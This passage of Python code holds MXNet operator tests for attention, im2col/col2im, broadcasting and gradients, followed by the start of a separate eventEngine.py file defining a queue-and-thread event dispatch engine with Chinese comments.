qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, nd
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for i in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def hybrid_forward(self, F, X, axis=1):
X1 = self.den(X)
if self.use_take:
X2 = F.take(X1, nd.array([0]), axis=axis)
else:
X2 = F.slice_axis(X1, begin=0, end=1, axis=axis)
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = nd.array(X), nd.array(Y)
seed = np.random.randint(1000)
# Using F.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using F.slice_axis
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
eventEngine.py
|
# encoding: UTF-8
# 系统模块
from Queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# 第三方模块
from PyQt4.QtCore import QTimer
# 自己开发的模块
from eventType import *
########################################################################
class EventEngine(object):
"""
事件驱动引擎
事件驱动引擎中所有的变量都设置为了私有,这是为了防止不小心
从外部修改了这些变量的值或状态,导致bug。
变量说明
__queue:私有变量,事件队列
__active:私有变量,事件引擎开关
__thread:私有变量,事件处理线程
__timer:私有变量,计时器
__handlers:私有变量,事件处理函数字典
方法说明
__run: 私有方法,事件处理线程连续运行用
__process: 私有方法,处理事件,调用注册在引擎中的监听函数
__onTimer:私有方法,计时器固定事件间隔触发后,向事件队列中存入计时器事件
start: 公共方法,启动引擎
stop:公共方法,停止引擎
register:公共方法,向引擎中注册监听函数
unregister:公共方法,向引擎中注销监听函数
put:公共方法,向事件队列中存入新的事件
事件监听函数必须定义为输入参数仅为一个event对象,即:
函数
def func(event)
...
对象方法
def method(self, event)
...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self):
"""引擎启动"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
self.__timer.start(1000)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
########################################################################
class EventEngine2(object):
"""
计时器使用python线程的事件驱动引擎
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
